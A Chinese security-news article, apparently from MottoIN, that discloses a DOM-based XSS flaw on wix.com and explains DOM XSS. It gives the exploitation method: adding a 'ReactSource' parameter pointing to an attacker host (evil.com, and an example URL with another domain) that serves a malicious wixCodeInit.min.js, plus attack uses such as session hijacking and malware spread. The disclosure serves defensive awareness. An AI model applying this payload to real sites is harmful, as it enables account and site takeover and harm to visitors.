猫头鹰
信安舆情早知道

wix.com的Dom-Basic XSS漏洞

前言

wix.com是Java和HTML5出版平台,目前用户已经超过了数百万。而最近有研究人员在wix.com上面发现了基于DOM的跨站脚本漏洞,该漏洞被攻击者利用来对任何运行在wix.com上面的网站并获取控制权。

什么是Dom-Basic XSS

基于Dom的XSS攻击,其中攻击的有效载荷在受害者使用的浏览器上修改Dom环境从而被用作是原客户端的脚本,客户端的代码在一个“意外”的方式下运行,也就是说,页面本身不会改变,但是页面中包含的客户端代码由于DOM环境中发生的恶意修改而有所不同。

基于DOM的XSS攻击与常见的XSS攻击截然不同,由于服务器端脆弱性而在响应页面中提供恶意有效载荷。

利用

在wix.com上有一个严重的DOM-XSS漏洞,允许攻击者完全控制人和托管在wix上面的网站。只需要将一个参数添加到在wix上面创建的任何网站,攻击者可以导致目标网站加载并运行一部分攻击者的JavaScript。

方式:

  •  URL尾部添加: ?ReactSource=http://evil.com 这里的网站是你在wix.com上面创建的任何网站。
  •  确保evil.com在/packages-bin/wixCodeInit/wixCodeInit.min.js中包含一个恶意文件

这里有一个利用漏洞反射载荷的例子:

%e5%9b%be%e7%89%871

攻击方式

对与这个漏洞拥有两种不同的攻击方式:

一种是wix网站所有者为了吸引攻击者访问从而加载一个特定的JavaScript用于劫持浏览器的会话。wix网站的所有者可能会利用该漏洞去散发恶意软件,创建基于浏览器的动态分布式僵尸网络,挖掘电子货币,但通常是为了控制网站的内容以及使用它的用户。

另一种攻击方式是,用户被一个特制的URL引诱到Wix网站,该URL通过基于DOM的XSS攻击将JavaScript加载到目标Wix.com网站。

而在这两种情况下,攻击者需要编写恶意JavaScript并利用URL指向它(即“http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com”)。

转载请注明来自MottoIN,未经允许不得转载!MottoIN » wix.com的Dom-Basic XSS漏洞

分享到:更多 ()

评论 抢沙发

评论前必须登录!

 

MottoIN 换一个角度看安全

寻求报道联系我们